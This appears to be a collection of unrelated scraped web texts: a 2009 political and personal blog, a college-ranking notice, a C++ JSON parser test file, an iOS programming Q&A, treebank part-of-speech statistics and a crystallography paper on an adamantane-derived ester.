My love affair with basketball began with the one and only Rick Pitino - OMG - he is sizzlingly hot - as in GQ, mui caliente and anything else I can think of to describe this man with whom I have had a one-sided love affair for some two decades. We were living in Kentucky, where basketball is life - it is the only thing to live for - okay, okay - there is the Kentucky derby, horsebreeding and some other minor league sports, but NCAA basketball, specifically the rivalry between Pitino's now Louisville Cardinals and then Kentucky Wildcats. There was nothing else to do, but learn to love the game.
I would watch with my then husband and our three sons - we would schlep all over Kentucky as my husband coached church basketball teams - young men up until the age of 18 - he was still playing on adult leagues himself at the time, but we loved it! Saturdays were basketball days. We would pile into the car and drive from tournament to tournament.
When we did not have games to visit, we piled onto the bed in the master bedroom and watched NCAA games - it was a thrilling time!
Rick Pitino went on to coach the Knicks and Celtics and has done amazing things for basketball - indeed, he is the only NCAA coach to lead 3 different schools to the NCAA Final Four - all that and hotter than hell too!
Let's not stop there - we have the amazing GQ esque Pat Riley and a host of other NCAA and NBA coaches.
As I stated in my bio of this blog when I began blogging over a year ago - hot men are in abundance in New York, but hotter men are found all in one place during March Madness!
This headline is from Slate Magazine posted on March 9. The well-written story comes to us courtesy of Leigh Alexander.
I have been a friend of the ACLU for many years, but every now and again, I find myself penned into a corner, such as at the subject matter of this story. I am a passionate advocate of free speech and would never presume to tell anyone what to do or think, with the exception of my 4 amazing sons, and even now, as they are older, trust that I have laid a foundation for them to make wise choices for themselves in their post adolescent and now college years.
Here is the link to the entire post: http://www.slate.com/id/2213073/pagenum/all/#p2. I must confess, I ordinarily read an entire story before posting, but in this instance, became quite disgusted at the level that ordinary Japanese men are going to commit rape, even suggesting appropriate trains and timetables for the best case scenarios.
Granted, anything is available online, including this smut, but what message are we trying to send? Is it really ok to glorify violence against women?
I am behind Christine Quinn and will send a strongly worded email to Mayor Bloomberg indicating that we should go to any lengths legally possible to keep such a scourge from our wonderful city of New York.
Why on earth has it taken so long for the powers that be to acknowledge that the US public has changed the way it does business?
Telephone companies have recognized that many of us no longer use land lines. With mobile phones and wireless Internet being the most commonly used forms of communication for voice and Internet, home phones are all but extinct.
Finally, the US Post Office is reviewing their pricing, Saturday deliveries, having employees opt for early retirement and closing some unnecessary facilities. We have all seen the writing on the wall for years now. What on earth took them so long at the US Post Office?
For far too long now, the Post Office has arbitrarily raised prices on stamps and other services, all without improving services except in minute instances - for too long, they have held the American public hostage with their lock on delivering the mail. Well, we have outsmarted them - we have figured out how to e-pay, phone-pay and block our junk mail - I am pleasantly surprised and truthfully, happy, when I hear my personal mail carrier in our office, comment at how the Post Office is going out of business. I won't miss the junk mail, the arbitrary price gouging, the union grievances and all that has come to symbolize the Post Office.
Good riddance to poor management on any level and in any organization, even if you THINK you have automony. There are lessons to be learned here for many.
Friday, March 20, 2009
It is beginning to sound like a game of "Who's on First?" I have no idea when that show started - I have never seen it, but in my 20 years of living in America, have had it quoted to me enough that I know vaguely how it works........enough said. I think you get the point.
"I started it - no - he did - no - she did - no you did!" Is this a squabble between preschoolers? No, these would be AIG employees, former and present, who are trying desperately to distance themselves from the bonus debacle that has Americans from all socioeconomic groups outraged, to say the very least.
Again, let me refresh your memories, dear readers - AIG received millions of dollars ($173 billion to be precise) in federal funds for a bailout - they were, we were told, too large to fail - and now we hear that those who essentially ran the company into the ground did not only that, but managed to get some $160+ million in bonuses - all this for "doing a heckuva job" - where have I heard that before?
I hate to sound like a scratched record, but as a taxpayer and part owner of AIG, I want those bonuses paid back - all of them - in their entirety and sooner rather than later and I really don't care how we go about doing it. If there are no laws in place to address such grievances, then let the Attorney General Eric Holder see about getting some written and forthwith! Am I angry about this? I can't remember the last time I was so heated about an issue I was blogging about.
Is it time to bring Eliot Spitzer back? He originally brought the misdeeds of AIG executives to light before his call girl shenanigans.
It was in days gone by - the Victory Garden from World War II. The First Lady, Michelle Obama and her children, along with students from a local elementary school planted an organic garden at the White House.
What a wonderful role model and example for the nation to follow.
We are in difficult times economically and financially - planting organic gardens and community gardens is one way to bridge the gap between income and outgo for many families. This is a way for families and neighbors to come together - to help one another, to get to know each other and to draw closer as we work together to help the country climb out of this quagmire.
Yours truly - the untouchable and beloved 44th President of our country - yes - that would be President Obama - has managed to offend a group of citizens around the world - including moi.
It appears that last evening, on the Tonight Show with Jay Leno, the President bemoaned his abysmal bowling scores while practicing his craft at the White House bowling alley - you might recall it was the one and only gaffe of his campaign - he then likened them - his bowling scores, that is, to the "Special Olympics." It was a most unfortunate poor choice of words.
Aboard his aircraft and before the show even aired last evening, he was on the phone to the head of Special Olympics to apologize for the gaffe, or should we say faux pas.
I have a disability - I don't have a bandage, walk with a limp, use a cane or other walking aid, but it is a serious intellectual disability nonetheless. President Obama should know that his words will be even more closely scrutinized at his level of office.
We as a nation and a world should stop finding fault and making jokes about "those people" - whoever the "undesirables du jour" happen to be.
It was good and right that he apologize - I hope that he spoke with his children about the error of his verbiage.
Enough said.
Apparently not - in a twist of fate, the following story posted on my mobile device in the wee hours on CNN today:
An unexpected and sudden spotlight on the Special Olympics, an organization that for more than 40 years has served and honored those with intellectual disabilities, comes less than two weeks before the nonprofit launches a new campaign: Spread the Word to the End the Word.March 31 is being billed a "national day of awareness," a call to Americans to recognize and rethink their use of the word "retard," or as the organization would prefer, the "R-word.""Most people don't think of this word as hate speech, but that's exactly what it feels like to millions of people with intellectual disabilities, their families and friends," a statement about the campaign reads. "This word is just as cruel and offensive as any other slur."The push for increased respect is being spearheaded by young people who are collecting pledges or vows to not use the word at http://www.r-word.org/, and are leading online discussions on how people can get involved in this cause.
So far, across the country, 300 schools have already committed to hosting rallies on March 31, Special Olympics President and CEO J. Brady Lum said. An aggressive print and online campaign, targeting people ages 18 to 30, will follow, said Kirsten Suto Seckler, who directs the organization's global brand marketing and awareness. The ads designed by BBDO New York, will challenge the public -- with language meant to raise eyebrows -- to think about the issue more deeply.
The campaign uses slurs against Asians, homosexuals, Jews and African-Americans to make the point that language can be harmful to all groups, including people with intellectual disabilities. Attention on the Special Olympics skyrocketed Thursday when, in a quick and clearly unscripted moment, President Obama exhibited the power of words during his history-making visit with Jay Leno.While joking on The Tonight Show about his bowling prowess (during last year's campaign trail he shamefully scored 37 in a game), Obama said he'd been practicing at the White House.He told Leno that he bowled 129 in the White House bowling alley and said his bowling skills are "like Special Olympics or something."
The comment during the taping of the show prompted Obama to pick up the phone on Air Force One and call Special Olympics Chairman Timothy Shriver to preemptively apologize for the remark before it hit television screens. He also reportedly invited Special Olympic athletes to Pennsylvania Avenue to hit the lanes and give him tips or shoot some hoops. The president "expressed his heartfelt and sincere commitment to work with our athletes and make this country a more accepting place for people with special needs," Lum, the organization's president, said.What Obama said on The Tonight Show adds to the discussion that's needed to raise awareness and has proven "an incredibly important and seriously teachable moment," Lum said. From playgrounds to the "top rungs of our leadership, including our president," he said Americans have plenty to talk about and learn when it comes to stereotypes and how words can sting.
And from this person with an intellectual disability - I say to all of us - don't use those words - not in jest, not in context, not out of context, or even unthinkingly - we are all lesser persons when we do not understand our fellow human beings, no matter our differences
Tuesday, March 17, 2009
AIG has become the proverbial tar baby of this economic fallout - huge bonuses, stock options, private jets and golden parachutes are commonplace, and the taxpaying public has decided - enough!
Congress is now looking to levy huge taxes on those at AIG who received the bonuses. Had I my druthers, I would like NY's AG Andrew Cuomo to "out" those rascals and publish their names in the Wall Street Journal or NY Times for all the world to see exactly where their wrath should be directed.
Please don't misunderstand - I am not against bonuses per se, certainly not those linked to performance, but in this case, not only did these executives pretty much run AIG into the ground, but the American public has bailed out AIG to a tune of significant proportions (more than $170 million) and I do not think that now is the time for any of the executives to dig deeper into the proverbial pot, particularly given the country's financial woes, and given that some of the workers are no longer still employed by the company.
I also particularly liked the following two quotes from prominent Democrats: "One way or another, we're going to try to figure out how to get these resources back," said Christopher Dodd, D-Conn., the panel's chairman.
Sen. Jon Tester, D-Mont., said AIG executives "need to understand that the only reason they even have a job is because of the taxpayers."
It is again, important to note that the taxpayers - yes, that's you, me and all the rest of the working public - out there - bailed out AIG before and we, the American public own about 80% of AIG.
I am with Harry Reid on this one - tax them to the hilt on those bonuses!
Denying ones sexuality, not engaging in homosexuality or gasp - trying to get married. Can you imagine the fallout amongst hetorosexuals were they to be told that for 20 years of their military career, they could not be true to themselves, literally denying their very essence for the sake of political expediency?
For years, women struggled and fought alongside men for the right to be seen as something other than property in order to achieve the right to vote. For years, blacks and whites marched in civil disobedience so that slaves could be free and so that blacks would have the right to vote.
The Gay issue is the civil rights issue of our times - we all know someone - a friend, a family member or even a co worker who is gay - at times like these, we need to stand tall - write to your elected official and tell them enough of this - no more firing good and decent men and women from the armed services simply for daring to be openly gay!
Wednesday, March 11, 2009
On a day when President Obama has introduced a council on women and girls, we reflect on the recent shootings that have taken place around the globe - Students massacred in their high school in Germany, British soldiers, senselessly murdered by IRA terrorists, the minister shot before his beloved flock in Illinois over the weekend, and the unspeakable mass shooting in Alabama yesterday where at least one small child was killed and another awaits serious surgery to remove a bullet from near an artery according to news reports.
These shootings took place all over the world and yet they were all perpetrated by men. Why are men more prone to kill so violently and so many at one time?
We should call for a day of prayer where we can abstain from the senseless violence that has overpowered the world - we need peace at a time when we celebrate the one who brought peace - Easter and Passover being the holiest of holidays for so many of us. Easter vigils and Passover Seders are going to be held in upcoming weeks and we would all do well to remember how fortunate we are to be alive in this frenetic world in which we live.
Comments are welcome - particularly from men who have strong opinions on what I have written.
It is hardly surprising that this forward thinking, raised by a single mother mostly and revered by his maternal grandmother who also helped to raise him for a few years - a man surrounded by Sasha and Malia and the wonderful Michele.....has come upon this amazing idea.
Women and girls have long been overlooked with regard to policy in this country - from discrepencies around birth control and other health care concerns to savage inequities in pay.
I am so proud of his nominating Kathleen Sibelius to be HHS and believe that she will do an outstanding job of representing women and girls and yes - even the often over-represented men of this country.
We women have taken a back seat for so very long - we have struggled with earning less than our cohorts, whether that be at a discount store or at the upper echelons of management - women have always earned considerably less than their peers - this is ending with the introduction of the equal pay legislation "Ledbetter act" that was passed shortly after Obama's swearing in as the new President in January.
Yes, we have come a long way, but we have still further to go yet. We need to continue to hold our elected officials accountable when it comes to things like maternity leave, healthcare, work-life-balance, family planning options and the list goes on.
About Me
I am 48 years old, born and raised in London England - my parents are Jamaican - I lived in Germany for 7 years, speak fluent French and German and am now living in New York after 20 years of wandering between Oklahoma, Kentucky, Michigan, barely surviving Utah and love the diversity of religion, politics, thought, and people - did I say hot men???? | 2023-10-14T01:27:15.642919 | https://example.com/article/9041 |
Xavier is named a "Best Value" in private colleges by Kiplinger's Personal Finance
Kiplinger’s Personal Finance lists Xavier as one of the nation’s "100 Best Values" among private colleges and universities and one of only five private colleges in Ohio to receive a top 100 ranking.
The rankings “reflect the best private colleges and universities with strong academics, attractive prices and generous financial aid,” according to Kiplinger's. Other schools on the list include Yale, Harvard, Notre Dame, Boston College and Dartmouth. Xavier is ranked No. 77 overall.
Kiplinger’s bases its rankings on a combination of academics and affordability, with quality accounting for two-thirds of the total. They start with data on more than 600 private institutions provided by Peterson’s, then add their own reporting.
Institutions are sorted into liberal arts colleges, which focus on undergraduate education, and universities, which include graduate students.
The costs reflect the amount each institution charges and the average amount of financial aid each institution offers for one academic year only. Rankings are based on measurable criteria, such as student-faculty ratios, admission rates, on-time graduation rate, sticker price and financial aid. To break ties, they use academic-quality scores and average debt at graduation. | 2023-09-02T01:27:15.642919 | https://example.com/article/1200 |
//===- JsonValueTest.cpp --------------------------------------------------===//
//
// The ONNC Project
//
// See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#include <skypat/skypat.h>
#include <onnc/ADT/Rope.h>
#include <onnc/JSON/Value.h>
#include <onnc/JSON/Type.h>
#include <onnc/JSON/Reader.h>
#include <onnc/JSON/String.h>
#include <onnc/ADT/StringRef.h>
#include <onnc/Support/IOStream.h>
#include <cstring>
#include <string>
using namespace onnc;
using namespace onnc::json;
//===----------------------------------------------------------------------===//
// JsonValue Test
//===----------------------------------------------------------------------===//
SKYPAT_F(JsonValueTest, default_constructor)
{
json::Value val;
EXPECT_TRUE(val.isUndefined());
}
SKYPAT_F(JsonValueTest, copy_undefined)
{
json::Value val;
json::Value cpy = val;
EXPECT_TRUE(cpy.isUndefined());
}
SKYPAT_F(JsonValueTest, clear)
{
json::Value val(0.0);
EXPECT_EQ(val.type(), json::Type::FLOAT);
val.clear();
EXPECT_EQ(val.type(), json::Type::UNDEF);
}
SKYPAT_F(JsonValueTest, check_type)
{
ASSERT_TRUE(is_integral<long long int>::value);
ASSERT_TRUE(is_integral<long int>::value);
ASSERT_TRUE(is_integral<int>::value);
ASSERT_FALSE(is_floating<long long int>::value);
ASSERT_FALSE(is_floating<long int>::value);
ASSERT_FALSE(is_floating<int>::value);
ASSERT_FALSE(is_floating<long long int>::value);
ASSERT_FALSE(is_floating<long int>::value);
ASSERT_FALSE(is_floating<int>::value);
ASSERT_TRUE(is_integral<long long int>::value);
ASSERT_TRUE(is_integral<long int>::value);
ASSERT_TRUE(is_integral<int>::value);
ASSERT_TRUE(is_bool<bool>::value);
ASSERT_TRUE(is_string<const char*>::value);
ASSERT_TRUE(is_string<StringRef>::value);
ASSERT_TRUE(is_string<std::string>::value);
ASSERT_FALSE(is_string<bool>::value);
ASSERT_TRUE(is_object<Object>::value);
ASSERT_FALSE(is_object<std::string>::value);
ASSERT_TRUE(is_array<Array>::value);
ASSERT_FALSE(is_array<const char*>::value);
}
SKYPAT_F(JsonValueTest, value_int)
{
long long int N = 10;
long int O = 10;
int P = 10;
json::Value n(N);
json::Value o(O);
json::Value p(P);
long double X = 1.0;
double Y = 1.0;
float Z = 1.0;
json::Value x(X);
json::Value y(Y);
json::Value z(Z);
ASSERT_EQ(json::INT, n.type());
ASSERT_EQ(json::INT, o.type());
ASSERT_EQ(json::INT, p.type());
ASSERT_EQ(json::FLOAT, x.type());
ASSERT_EQ(json::FLOAT, y.type());
ASSERT_EQ(json::FLOAT, z.type());
}
SKYPAT_F(JsonValueTest, read_from_string)
{
const char* content = "[ \"a\", \"b\"]";
json::Reader reader;
json::Value value;
reader.read(content, value);
ASSERT_TRUE(0 == ::strcmp(value.toArray().at(0).toString(), "a"));
ASSERT_TRUE(0 == ::strcmp(value.toArray().at(1).toString(), "b"));
}
SKYPAT_F(JsonValueTest, notation_check)
{
json::Value v;
json::Object o;
json::Array a;
ASSERT_EQ(v.type(), json::UNDEF);
ASSERT_EQ(o.type(), json::OBJECT);
ASSERT_EQ(a.type(), json::ARRAY);
}
SKYPAT_F(JsonValueTest, assignments)
{
json::Value value;
value.assign(5);
ASSERT_EQ(value.toInteger(), 5);
int a = 10;
value.assign(a);
ASSERT_EQ(value.toInteger(), 10);
const char* s = "test string";
json::Value v2;
v2.assign(s);
ASSERT_EQ(::strlen(v2.toString()), 11);
}
SKYPAT_F(JsonValueTest, object_test)
{
json::Object obj;
obj["name"] = "test";
ASSERT_EQ(obj.type(), json::OBJECT);
ASSERT_EQ(obj["name"].type(), json::STRING);
ASSERT_TRUE(0 == ::strcmp(obj["name"].toString(), "test"));
EXPECT_EQ(obj.size(), 1);
obj["other"] = "test";
EXPECT_EQ(obj.size(), 2);
EXPECT_TRUE(obj.hasValue("other"));
json::Object::iterator pair, pEnd = obj.end();
for (pair = obj.begin(); pair != pEnd; ++pair) {
EXPECT_TRUE(0 == ::strcmp(pair->value().toString(), "test"));
}
}
// This test case is used to examine control charactor
SKYPAT_F(JsonValueTest, string_test)
{
std::string content((Rope("{\n") +
Rope("\"option\" : \"D\",\n") +
Rope("\"values\" : [ \"") +
Rope("FLAGS_STR=\\\\\\\"\\\" -DPERFORMANCE_RUN=1 \\\"\\\\\\\"") +
Rope("\" ]\n") +
Rope("}")).str());
json::Reader reader;
json::Value value;
ASSERT_TRUE(reader.read(content.c_str(), value));
ASSERT_TRUE(value.isObject());
json::Object& obj = value.asObject();
EXPECT_TRUE(obj["option"].isString());
EXPECT_TRUE(0 == ::strcmp(obj["option"].toString(), "D"));
ASSERT_TRUE(obj["values"].isArray());
json::Array& arr = obj["values"].asArray();
EXPECT_EQ(arr.size(), 1);
ASSERT_TRUE(arr.front().isString());
}
SKYPAT_F(JsonValueTest, string_trim)
{
const char* s1 = "FLAGS_STR=\\\\\\\"\\\" -DPERFORMANCE_RUN=1 \\\"\\\\\\\"";
ASSERT_TRUE(0 == json::trim(s1).compare("FLAGS_STR=\\\"\" -DPERFORMANCE_RUN=1 \"\\\""));
const char* s2 = "\\ttab";
ASSERT_TRUE(0 == json::trim(s2).compare(" tab"));
const char* s3 = "backspace\\b";
ASSERT_TRUE(0 == json::trim(s3).compare("backspace\b"));
const char* s4 = "new\\nline";
ASSERT_TRUE(0 == json::trim(s4).compare("new\nline"));
}
| 2023-10-28T01:27:15.642919 | https://example.com/article/2457 |
Q:
iOS: HTTP service returning , how to test for this?
I have an app that relies on a web service that I have no control over. I'm currently trying to solve a bug.
In a particular case, an asynchronous HTTP request returns
"<null>"
When this happens I get an exception and my app crashes.
I've tried every method I can think of to test for this in an if statement including comparing various strings, arrays, and testing for the characters < and >. Essentially I want to break from a method if the value is found.
Has anyone run into this before, and how did you solve it?
Many thanks :)
A:
Ok, I figured it out. It must have helped to write the problem down. I hadn't created an IDENTICAL null object to compare it to yet. My null object actually was generated by a snippet of JSON code, so all i had to do was replicate such an object and use isEqual: to compare them.
| 2023-08-30T01:27:15.642919 | https://example.com/article/5680 |
---
layout: base
title: 'Statistics of PUNCT in UD_Romanian-SiMoNERo'
udver: '2'
---
## Treebank Statistics: UD_Romanian-SiMoNERo: POS Tags: `PUNCT`
There are 19 `PUNCT` lemmas (1%), 19 `PUNCT` types (0%) and 1984 `PUNCT` tokens (14%).
Out of 15 observed tags, the rank of `PUNCT` is: 10 in number of lemmas, 11 in number of types and 3 in number of tokens.
The 10 most frequent `PUNCT` lemmas: <em>,, ., (, ), /, -, [, ], %, <</em>
The 10 most frequent `PUNCT` types: <em>,, ., (, ), /, -, [, ], %, <</em>
The 10 most frequent ambiguous lemmas:
The 10 most frequent ambiguous types:
## Morphology
The form / lemma ratio of `PUNCT` is 1.000000 (the average of all parts of speech is 1.477080).
The 1st highest number of forms (1) was observed with the lemma “%”: <em>%</em>.
The 2nd highest number of forms (1) was observed with the lemma “(”: <em>(</em>.
The 3rd highest number of forms (1) was observed with the lemma “)”: <em>)</em>.
`PUNCT` occurs with 1 features: <tt><a href="ro_simonero-feat-AdpType.html">AdpType</a></tt> (36; 2% instances)
`PUNCT` occurs with 1 feature-value pairs: `AdpType=Prep`
`PUNCT` occurs with 2 feature combinations.
The most frequent feature combination is `_` (1948 tokens).
Examples: <em>,, ., (, ), -, [, ], %, <, ></em>
## Relations
`PUNCT` nodes are attached to their parents using 1 different relations: <tt><a href="ro_simonero-dep-punct.html">punct</a></tt> (1984; 100% instances)
Parents of `PUNCT` nodes belong to 11 different parts of speech: <tt><a href="ro_simonero-pos-NOUN.html">NOUN</a></tt> (852; 43% instances), <tt><a href="ro_simonero-pos-VERB.html">VERB</a></tt> (578; 29% instances), <tt><a href="ro_simonero-pos-NUM.html">NUM</a></tt> (278; 14% instances), <tt><a href="ro_simonero-pos-ADJ.html">ADJ</a></tt> (151; 8% instances), <tt><a href="ro_simonero-pos-ADV.html">ADV</a></tt> (39; 2% instances), <tt><a href="ro_simonero-pos-X.html">X</a></tt> (33; 2% instances), <tt><a href="ro_simonero-pos-ADP.html">ADP</a></tt> (21; 1% instances), <tt><a href="ro_simonero-pos-PRON.html">PRON</a></tt> (16; 1% instances), <tt><a href="ro_simonero-pos-PROPN.html">PROPN</a></tt> (10; 1% instances), <tt><a href="ro_simonero-pos-AUX.html">AUX</a></tt> (4; 0% instances), <tt><a href="ro_simonero-pos-CCONJ.html">CCONJ</a></tt> (2; 0% instances)
1984 (100%) `PUNCT` nodes are leaves.
The highest child degree of a `PUNCT` node is 0.
| 2024-03-30T01:27:15.642919 | https://example.com/article/5806 |
Related literature {#sec1}
==================
For some important biologically active compounds bearing the adamantane moiety, see: Jia *et al.* (2005[@bb2]); van der Schyf & Geldenhuys (2009)[@bb5]. For the synthesis, see: Vícha *et al.* (2009[@bb7]).
Experimental {#sec2}
============
{#sec2.1}
### Crystal data {#sec2.1.1}
C~18~H~23~NO~2~*M* *~r~* = 285.37Monoclinic,*a* = 25.8665 (19) Å*b* = 6.4575 (4) Å*c* = 38.6173 (8) Åβ = 106.904 (7)°*V* = 6171.7 (6) Å^3^*Z* = 16Mo *K*α radiationμ = 0.08 mm^−1^*T* = 120 K0.40 × 0.30 × 0.30 mm
### Data collection {#sec2.1.2}
Oxford Diffraction Xcalibur diffractometer with a Sapphire2 detectorAbsorption correction: multi-scan (*CrysAlis RED*; Oxford Diffraction, 2006[@bb4]) *T* ~min~ = 0.849, *T* ~max~ = 1.00023009 measured reflections5431 independent reflections2752 reflections with *I* \> 2σ(*I*)*R* ~int~ = 0.051
### Refinement {#sec2.1.3}
*R*\[*F* ^2^ \> 2σ(*F* ^2^)\] = 0.039*wR*(*F* ^2^) = 0.061*S* = 1.045431 reflections395 parametersH atoms treated by a mixture of independent and constrained refinementΔρ~max~ = 0.21 e Å^−3^Δρ~min~ = −0.19 e Å^−3^
{#d5e494}
Data collection: *CrysAlis CCD* (Oxford Diffraction, 2006[@bb4]); cell refinement: *CrysAlis RED* (Oxford Diffraction, 2006[@bb4]); data reduction: *CrysAlis RED*; program(s) used to solve structure: *SHELXS97* (Sheldrick, 2008[@bb6]); program(s) used to refine structure: *SHELXL97* (Sheldrick, 2008[@bb6]); molecular graphics: *ORTEP-3* (Farrugia, 1997[@bb1]) and *Mercury* (Macrae *et al.*, 2008[@bb3]); software used to prepare material for publication: *SHELXL97*.
Supplementary Material
======================
Crystal structure: contains datablocks global, I. DOI: [10.1107/S1600536810047276/nk2072sup1.cif](http://dx.doi.org/10.1107/S1600536810047276/nk2072sup1.cif)
Structure factors: contains datablocks I. DOI: [10.1107/S1600536810047276/nk2072Isup2.hkl](http://dx.doi.org/10.1107/S1600536810047276/nk2072Isup2.hkl)
Additional supplementary materials: [crystallographic information](http://scripts.iucr.org/cgi-bin/sendsupfiles?nk2072&file=nk2072sup0.html&mime=text/html); [3D view](http://scripts.iucr.org/cgi-bin/sendcif?nk2072sup1&Qmime=cif); [checkCIF report](http://scripts.iucr.org/cgi-bin/paper?nk2072&checkcif=yes)
Supplementary data and figures for this paper are available from the IUCr electronic archives (Reference: [NK2072](http://scripts.iucr.org/cgi-bin/sendsup?nk2072)).
Financial support of this work by an internal grant from TBU in Zlín (No. IGA/7/FT/10/D) funded from the resources of specific university research is gratefully acknowledged.
Comment
=======
Adamantane is a polycyclic hydrocarbon isolated by Czech chemists from petroleum fraction in the year 1933. Owing to its high lipophilicity and stability, adamantane is frequently used for the modification of compounds with known biological activity. The resulting molecules can display better pharmacodynamic and/or pharmacokinetic properties, such as SQ-109 -- tuberculostatic agent derived from ethambutol (*L*. Jia *et al.* 2005) or saxagliptin -- type 2 diabetes medicament (van der Schyf & Geldenhuys, 2009).
The asymmetric unit of the title compound (Fig. 1) consists of two crystallographically independent molecules slightly varying in their geometries. Both benzene rings are essentially planar with maximum deviations from the best plane being 0.0080 (19) Å for atom C5 in the first molecule and 0.0125 (19) Å for atom C22 in the second one. The dihedral angle between the best planes of the benzene rings is 26.889 (6)°. The torsion angles describing arrangement of benzene ring, adamantane cage and C7---O8---C9 linker C18--C10--C9--O8, C10--C9--O8--C7, C6--C7--O8--C9 and C1--C6--C7--O1 are -177.40 (14), -152.23 (16), -177.92 (15) and 14.4 (3)°, respectively. The values of corresponding torsion angles for the second distinct conformer are 174.24 (14), 160.52 (15), 177.07 (15) and -9.1 (3)°, respectively. While one conformer forms chains *via* N---H···O H-bonds parallel to the *b*-axis, the second conformer exhibits only intramolecular N---H···O hydrogen bond (Fig. 2, Table 1).
Experimental {#experimental}
============
The corresponding nitro ester - starting material for title compound preparation - was obtained by a procedure described previously (Vícha *et al.*, 2009). The nitro ester (100 mg, 0.3 mmol) was dissolved in 5 ml of methanol and a portion of iron powder (134 mg, 2.4 mmol) was added. Concentrated hydrochloric acid (1 ml) was added into well stirred mixture. Reaction mixture was kept under reflux until starting material disappeared. The reaction mixture was poured into 5% aqueous Na~2~CO~3~ (10 ml) and extracted with mixture of hexane/diethyl ether, 2/1, *v*/*v* several times. The collected organic layers were dried over anhydrous Na~2~SO~4~ and crude product was obtained after solvent evaporation. Column chromatography (petroleum ether/ethyl acetate, 8:1, *v*/*v*) yielded 71 mg (83%) of yellow crystalline powder. The single-crystal used for data collection was obtained by crystallization from chloroform at room temperature.
Refinement {#refinement}
==========
Carbon bound hydrogen atoms were positioned geometrically and refined as riding using standard *SHELXTL* constraints, with their *U*~iso~ set to 1.2*U*~eq~ of their parent atoms. Nitrogen bound hydrogen atoms were located in a difference Fourier map and refined isotropically.
Figures
=======
{#Fap1}
{#Fap2}
Crystal data {#tablewrapcrystaldatalong}
============
----------------------- ---------------------------------------
C~18~H~23~NO~2~ *F*(000) = 2464
*M~r~* = 285.37 *D*~x~ = 1.229 Mg m^−3^
Monoclinic, *C*2/*c* Melting point = 366--362 K
Hall symbol: -C 2yc Mo *K*α radiation, λ = 0.71073 Å
*a* = 25.8665 (19) Å Cell parameters from 4567 reflections
*b* = 6.4575 (4) Å θ = 2.7--27.3°
*c* = 38.6173 (8) Å µ = 0.08 mm^−1^
β = 106.904 (7)° *T* = 120 K
*V* = 6171.7 (6) Å^3^ Block, yellow
*Z* = 16 0.40 × 0.30 × 0.30 mm
----------------------- ---------------------------------------
Data collection {#tablewrapdatacollectionlong}
===============
------------------------------------------------------------------------------ --------------------------------------
Oxford Diffraction Xcalibur diffractometer with a Sapphire2 detector 5431 independent reflections
Radiation source: Enhance (Mo) X-ray Source 2752 reflections with *I* \> 2σ(*I*)
graphite *R*~int~ = 0.051
Detector resolution: 8.4353 pixels mm^-1^ θ~max~ = 25.0°, θ~min~ = 3.2°
ω scan *h* = −30→30
Absorption correction: multi-scan (*CrysAlis RED*; Oxford Diffraction, 2006) *k* = −7→7
*T*~min~ = 0.849, *T*~max~ = 1.000 *l* = −38→45
23009 measured reflections
------------------------------------------------------------------------------ --------------------------------------
Refinement {#tablewraprefinementdatalong}
==========
------------------------------------- ------------------------------------------------------------------------------------
Refinement on *F*^2^ Primary atom site location: structure-invariant direct methods
Least-squares matrix: full Secondary atom site location: difference Fourier map
*R*\[*F*^2^ \> 2σ(*F*^2^)\] = 0.039 Hydrogen site location: inferred from neighbouring sites
*wR*(*F*^2^) = 0.061 H atoms treated by a mixture of independent and constrained refinement
*S* = 1.04 *w* = 1/\[σ^2^(*F*~o~^2^) + (0.015*P*)^2^\] where *P* = (*F*~o~^2^ + 2*F*~c~^2^)/3
5431 reflections (Δ/σ)~max~ \< 0.001
395 parameters Δρ~max~ = 0.21 e Å^−3^
0 restraints Δρ~min~ = −0.19 e Å^−3^
------------------------------------- ------------------------------------------------------------------------------------
Special details {#specialdetails}
===============
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Geometry. All e.s.d.\'s (except the e.s.d. in the dihedral angle between two l.s. planes) are estimated using the full covariance matrix. The cell e.s.d.\'s are taken into account individually in the estimation of e.s.d.\'s in distances, angles and torsion angles; correlations between e.s.d.\'s in cell parameters are only used when they are defined by crystal symmetry. An approximate (isotropic) treatment of cell e.s.d.\'s is used for estimating e.s.d.\'s involving l.s. planes.
Refinement. Refinement of *F*^2^ against ALL reflections. The weighted *R*-factor *wR* and goodness of fit *S* are based on *F*^2^, conventional *R*-factors *R* are based on *F*, with *F* set to zero for negative *F*^2^. The threshold expression of *F*^2^ \> 2σ(*F*^2^) is used only for calculating *R*-factors(gt) *etc*. and is not relevant to the choice of reflections for refinement. *R*-factors based on *F*^2^ are statistically about twice as large as those based on *F*, and *R*- factors based on ALL data will be even larger.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Fractional atomic coordinates and isotropic or equivalent isotropic displacement parameters (Å^2^) {#tablewrapcoords}
==================================================================================================
------ ------------- -------------- ------------- -------------------- --
*x* *y* *z* *U*~iso~\*/*U*~eq~
O1 0.27207 (5) 0.3902 (2) 0.21497 (4) 0.0515 (4)
N1 0.29950 (7) 0.0010 (4) 0.24145 (5) 0.0430 (5)
C1 0.33939 (7) 0.0205 (3) 0.22478 (5) 0.0301 (5)
C2 0.37972 (8) −0.1306 (3) 0.23019 (5) 0.0372 (5)
H2 0.3797 −0.2432 0.2460 0.045\*
C3 0.41922 (8) −0.1190 (3) 0.21309 (5) 0.0422 (6)
H3 0.4464 −0.2227 0.2175 0.051\*
C4 0.42012 (8) 0.0413 (3) 0.18949 (5) 0.0429 (6)
H4 0.4476 0.0488 0.1777 0.052\*
C5 0.38052 (7) 0.1888 (3) 0.18354 (5) 0.0338 (5)
H5 0.3805 0.2978 0.1670 0.041\*
C6 0.34023 (7) 0.1848 (3) 0.20085 (5) 0.0251 (5)
C7 0.30047 (8) 0.3546 (3) 0.19566 (5) 0.0318 (5)
O8 0.29882 (4) 0.4694 (2) 0.16652 (3) 0.0386 (4)
C9 0.26212 (7) 0.6481 (3) 0.15911 (5) 0.0394 (6)
H9A 0.2807 0.7712 0.1723 0.047\*
H9B 0.2300 0.6187 0.1674 0.047\*
C10 0.24490 (7) 0.6899 (3) 0.11885 (5) 0.0272 (5)
C11 0.21169 (7) 0.5078 (3) 0.09824 (4) 0.0294 (5)
H11A 0.2343 0.3814 0.1021 0.035\*
H11B 0.1805 0.4813 0.1076 0.035\*
C12 0.19154 (7) 0.5575 (3) 0.05766 (5) 0.0323 (5)
